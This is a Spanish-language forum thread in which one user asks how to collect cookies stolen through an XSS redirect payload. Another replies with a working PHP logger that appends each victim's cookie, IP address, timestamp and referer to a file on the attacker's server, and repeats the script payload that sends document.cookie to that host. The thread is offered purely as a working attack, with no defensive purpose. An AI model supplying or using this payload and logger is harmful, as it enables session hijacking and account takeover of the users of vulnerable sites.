Problemas con reenvío de cookies.. en XSS vulnerable.

[Blixx]

Hola.. en un escenario típico donde una página es vulnerable a rediregir los navegadores, con el código:

Código [Seleccionar] Expandir


<script>window.location=site.com/steal.php?cookie='+document.cookie;</script>


para que luego steal.php grabe la variable cookie.. con el contenido de la cookie en un archivo log.txt digamos.. Pero ahora.. qué sitio permite grabar el texto, con la información obtenida? Es decir, la mayoría de servidores gratuitos no otorgan permiso de escritura en sus archivos..

Habría alguna forma alternativa.. de quizás, enviar el valor de 'cookie' usando steal.php.. pero a algún correo por ejemplo? O usando POST /formulario?=cookie.. Desde dónde podría ver el archivo que registra el steal.php que contiene $cookie = $_GET['cookie'];?

[ifcaro]

Yo en mi servidor de www.wwwpuntocom.com use este codigo y si m funciono:

guarda la variable ?c= en el archivo steal.php

Código [Seleccionar] Expandir


//cookies.php
<?php
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('steal.php', 'a');
fwrite($fp, '
Cookie: '.$cookie.'   <br>
IP: ' .$ip. ' <br>
Date and Time: ' .$date. '   <br>
Referer: '.$referer.' <br><br>');
fclose($fp);
?>

usa el codigo

Código [Seleccionar] Expandir


<script>window.location=site.com/cookies.php?c='+document.cookie;</script>